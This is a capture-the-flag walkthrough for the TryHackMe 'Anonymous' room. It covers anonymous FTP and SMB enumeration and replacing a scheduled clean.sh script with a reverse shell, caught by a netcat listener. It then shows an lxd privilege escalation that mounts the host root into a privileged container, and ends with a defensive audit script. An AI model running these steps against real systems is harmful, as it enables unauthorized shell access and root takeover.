Anonymous
Last updated
Room Link: https://tryhackme.com/room/anonymous
Kali
nmap -A $VICTIM
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
Kali
smbclient -L //$VICTIM/
There were just two dog pics, probably not interesting.
Kali
mkdir loot
cd loot
smbclient \\\\$VICTIM\\pics
prompt
mget *
Log in using anonymous and no password
Kali
ftp $VICTIM 21
binary
passive
cd scripts
mget *
There were these 3 files
I modified clean.sh to have a reverse shell back to my Kali
Kali #1
nc -lvnp 1337
Kali #2
ftp $VICTIM 21
binary
passive
cd scripts
put clean.sh
After a few minutes the script was run and I had a shell.
Get autocomplete
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Followed this link on lxd privilege escalation
Link: https://www.hackingarticles.in/lxd-privilege-escalation/
Victim
id
Kali
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81
Note: The command lxd init was used to resolve a storage pool issue; it may not always be needed.
Victim
cd /tmp
wget http://$KALI:81/alpine-v3.18-x86_64-20231111_1929.tar.gz
lxc image import ./alpine-v3.18-x86_64-20231111_1929.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
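For defenders, the two conditions this walkthrough depends on (a script in the FTP tree that anonymous users can overwrite, and a low-privileged account with lxd access) can be audited with the shell functions below. This is an added example, not part of the original writeup; the directory argument is a placeholder for the server's FTP root, and it assumes anonymous FTP maps to an unprivileged account.

```shell
#!/bin/sh
# Added defensive audit (not from the original writeup).
# Assumption: anonymous FTP maps to an unprivileged account, so files
# writable by "other" are the ones an anonymous client can replace.

# List regular files under DIR that any local or FTP user can overwrite.
world_writable_files() {
    find "$1" -type f -perm -0002 2>/dev/null | sort
}

# List accounts with lxd access: supplementary members from the group
# file plus accounts whose primary GID in the passwd file is lxd's GID.
lxd_members() {
    awk -F: '
        FNR == NR {                       # first file: group(5) format
            if ($1 == "lxd") {
                gid = $3
                n = split($4, m, ",")
                for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
            }
            next
        }
        gid != "" && $4 == gid { print $1 }   # second file: passwd(5)
    ' "${1:-/etc/group}" "${2:-/etc/passwd}" | sort -u
}

# audit DIR [GROUP_FILE] [PASSWD_FILE]
# Returns 0 only when both checks come back clean.
audit() {
    writable=$(world_writable_files "$1")
    members=$(lxd_members "$2" "$3" | grep -vx 'root' || true)
    if [ -n "$writable" ]; then
        echo "Files any user can overwrite (check what executes them):"
        echo "$writable"
    fi
    if [ -n "$members" ]; then
        echo "Non-root accounts with lxd access (root-equivalent):"
        echo "$members"
    fi
    [ -z "$writable" ] && [ -z "$members" ]
}

# Run directly as: sh audit.sh <ftp-root-placeholder>
if [ "$#" -ge 1 ]; then audit "$@"; fi
```

A non-zero exit from audit means at least one finding: tighten the file mode or ownership on anything listed, and remove accounts from the lxd group unless they are meant to be root-equivalent.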